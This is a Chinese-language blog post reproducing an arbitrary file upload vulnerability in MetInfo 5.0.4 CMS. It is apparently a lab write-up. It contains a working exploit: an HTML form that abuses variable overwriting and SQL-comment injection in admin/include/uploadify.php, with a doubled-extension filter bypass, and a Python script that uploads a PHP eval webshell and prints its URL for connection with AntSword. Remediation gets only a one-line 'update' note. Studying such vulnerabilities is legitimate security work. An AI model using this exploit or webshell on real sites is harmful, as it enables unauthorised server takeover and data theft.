metinfo_5.0.4_file-upload

最新推荐文章于 2024-06-16 19:46:58 发布
最新推荐文章于 2024-06-16 19:46:58 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 文件上传漏洞 metinfo 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43886198/article/details/111475099
版权

metinfo_5.0.4_file-upload

漏洞描述

MetInfo 是一个专业的企业级CMS建站系统,它的5.0.4 版本存在任意文件上传漏洞。

漏洞危害等级

高危

影响版本

5.0.4

漏洞复现

基础环境
组件版本
OSWindows 2008 R2 x64
Web ServerphpStudy 2016(特别版)
Source CodeMetInfoV5.0.4
漏洞演示
  • 本地构造HTML 表单,进行文件上传
  • 变量覆盖,SQL注入(# %23),双写绕过。
<html>
<form enctype="multipart/form-data" method="post" 
    name="myForm" 
    action="http://localhost/metinfov504/admin/include/uploadify.php?			metinfo_admin_id=aaa&metinfo_admin_pass=bbb&met_admin_table=met_a
    dmin_table%23&type=upfile&met_file_format=jpg|pphphp"
> 
<input name="Filedata" type="file" size=20> 
<input type="submit" name="Submit" value="submit"> 
</form>
</html>
  • 直接访问html文件,上传文件,上传成功
../upload/file/1606873883.php

在这里插入图片描述

  • WebShell 地址

http://host-3/html/MetInfo5.0.4/upload/file/1606873883.php

在这里插入图片描述

  • 蚁剑连接

在这里插入图片描述
在这里插入图片描述

深度利用

python脚本自动化

import requests
import sys

'''
MetInfo 是一个专业的企业级CMS建站系统,它的5.0.4 版本存在任意文件上传漏洞。


<html> 
<form enctype="multipart/form-data" 
    method="post" 
    name="myForm" 
    action="http://localhost/metinfov504/admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=bbb&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp" 
> 
<input name="Filedata" type="file" size=20> 
<input type="submit" name="Submit" value="submit"> 
</form> 
</html>
'''

url = sys.argv[1]
#url = "http://host-3/html/MetInfo5.0.4/"
fullUrl = url + "admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=bbb&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"

payload = "<?=@eval($_REQUEST[buzhidao])?>"

files = {'Filedata':('404.php',payload,'image/png')}
data = {'Submit':'submit'}

res = requests.post(url = fullUrl,files = files, data=data)

shellPath = res.text[4:]
shellPath = url + shellPath

print(shellPath)

漏洞修复

  • 更新到最新版本
暮光烛日
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
metinfo_5.0.4 任意文件本地包含漏洞复现(metinfo_5.0.4_lfi)
薛定谔嘚喵博客
05-06 405
include/module.php” 和 $mouble 这个变量,进行跟踪,打开 …/include/module.php,module.php里还包含着 “common.inc.php” ,我们先对module.php进行代码审计。可以看到当fmodule这个变量不等于7时,它就会对$module进行验证,接着对"common.inc.php"进行跟踪。发现common.inc.php的这段代码有漏洞点,双$$符号可能存在变量覆盖漏洞。我们要让fmodule=7,绕过对$module的验证。
MetInfo_V7.2.0短信接口插件demo.zip
11-02
MetInfo_V7.2.0短信接口插件:企业网站高效通信的得力助手》 MetInfo是一款广泛应用于企业建站的开源CMS系统,其最新版本V7.2.0引入了一项重要的功能增强——短信接口插件。这个插件的出现,使得企业网站在与用户...
metinfov5.0.4漏洞复现
千寻的博客
02-29 2485
文章目录第一章 介绍第二章环境搭建第三章存在漏洞第一节SQL注入第一步 注入点第二步 盲注第三步 漏洞原理第二节文件包含第一节漏洞页面第二节漏洞利用第三节漏洞分析第四节文件上传第一步 漏洞页面第二步 漏洞利用第三步 漏洞分析免责声明 第一章 介绍 MetInfo企业网站管理系统采用php+ Mysql架构全站内置了SEO搜索引优化机制,支持用户自定义界面语言(全球各种语言),拥有企业网站常用的模块...
快速使用MetInfo搭建自己的官网
最新发布
艾威氪的博客
06-16 445
以上步骤仅供参考,具体操作可能因主机提供商、域名注册商以及MetInfo版本的不同而有所差异。建议参考MetInfo的官方文档和教程进行搭建。
metinfo_5.0.4_filein-Include漏洞复现
m0_64583632的博客
02-06 360
metinfo_5.0.4_filein-Include漏洞复现
【文件包含】metinfo 5.0.4 文件包含漏洞复现
wj33333的博客
11-15 358
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 5.0.4版本中的/metinfo_5.0.4/about/index.php?fmodule文件存在任意文件包含漏洞。攻击者可利用漏洞读取网站上的敏感文件。
MetInfo_php源码_
09-30
MetInfo PHP website system is a collection of "computer mobile site WeChat public" triad of company system
metinfo_手机生成静态页面.zip
04-29
Metinfo手机生成静态页面详解》 在当前的互联网环境中,网页加载速度和用户体验成为了衡量一个网站质量的重要标准。为了提升这些指标,许多网站管理员选择使用静态页面技术。Metinfo,作为一个功能强大的企业建站...
MetInfo短信插件_MetInfo短信接口开发_MetInfo短信发送设置
01-07
MetInfo是一款功能强大的企业网站管理系统,它为企业提供了一站式的建站解决方案。在这个主题中,我们主要关注的是MetInfo的短信插件、短信接口开发以及短信发送设置的相关知识点。 一、MetInfo短信插件 MetInfo...
MetInfo 标签函数-模板制作教程-MetInfo使用教程.mht
06-06
MetInfo 标签函数-模板制作教程-MetInfo使用教程
冠龙科技企业网站管理系统
12-06
冠龙科技企业建站系统CMS是基于ASP开发的一套网络管理系统,正常使用该系统您必须保证您的服务器满足如下要求: 1) 软件系统:WIN2000+IIS5.0 / WINXP+IIS5.1 / WIN2003+IIS6.0 2) 数 据 库:Access2000 3) 其 他:服务器必须安装 微软IE浏览器5.0或以上版本 使用Email功能,需要安装Jmail 4.0或以上版本 部分功能需要服务器支持FSO(FileSystemObject) 推荐:Windows 2000+IIS5.0+Access2000+IE5.5环境测试
MetInfo 企业建站系统 v5.3.16
12-01
**MetInfo 企业建站系统 v5.3.16** MetInfo 是一款专为企业建站设计的内容管理系统(CMS),其v5.3.16版本具有诸多优势,深受新手和有一定PHP基础的开发者喜爱。该系统以轻量级、易用性著称,为快速搭建专业的企业...
MetInfo信息反馈系统 v1.2_metifs_v1.2.zip
12-22
MetInfo信息反馈系统 v1.2:构建高效企业与用户互动平台》 MetInfo信息反馈系统 v1.2,简称为"metifs_v1.2",是一款专为企业网站设计的反馈系统,旨在增强企业与用户之间的沟通效率,提供及时、有效的信息交流...
MetInfo信息反馈系统_网站在线聊天留言源码.rar
09-09
MetInfo信息反馈系统:构建高效网站在线交流的基石》 在互联网日益发达的今天,网站不仅是企业展示产品和服务的窗口,更是与客户互动的重要平台。MetInfo信息反馈系统,作为一个专业的网站在线聊天留言源码,为...
metinfo龙达企业自适应模板
09-01
Metinfo龙达企业自适应模板深度解析》 在当今数字化时代,企业网站不仅代表着公司的形象,更是与客户沟通的重要桥梁。Metinfo是一款强大的开源企业建站系统,以其易用性、灵活性和全面的功能深受广大用户的喜爱。...
metinfo 5.0.4 文件包含漏洞复现
一个努力学习网安的小牛马
11-15 254
metinfo cms 版本 5.0.4。
【漏洞复现】Metinfo5.0.4任意文件包含漏洞复现
过期的秋刀鱼
11-04 588
文件夹中有个新建文件shell.php,即可用蚁剑连接。下放入一张没有木马的图片,使用另一种方式制作图片木马。,当我们直接包含图片的时候,这段代码就会被执行。复制得到的base64编码格式的php代码。该段代码的含义是,在当前目录下创建一个名为。把POST请求体中的变量放到url中提交。,然后在下面写入php代码,点击send。上传图片木马,通过文件包含的方式去访问。bp拦截得到php源码的数据包。使用文件包含的方式去访问图片。该环境的文件上传点在。但是上传文件会失败,拿到webshell。
EXP-sql布偶型盲注 保姆级教程新手向(Metinfo5)
weixin_50166464的博客
08-12 225
题目原型:Metinfo5 引用库:requests 跑脚本是个很快的事情,分析EXP原理才是要干的事。 新手入门,敬请斧正。 --大部分思路转载自胡洋老师的教学 一:简单认识 requests库 首先简单认识一下这个库 import requests url = "http://your-ip/exp/index.php" headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) G
metinfo文件上传
09-01
所以,metinfo文件上传漏洞可以通过南方数据管理系统的数据库备份功能来利用。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* *2* *3* [【文件上传漏洞-...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值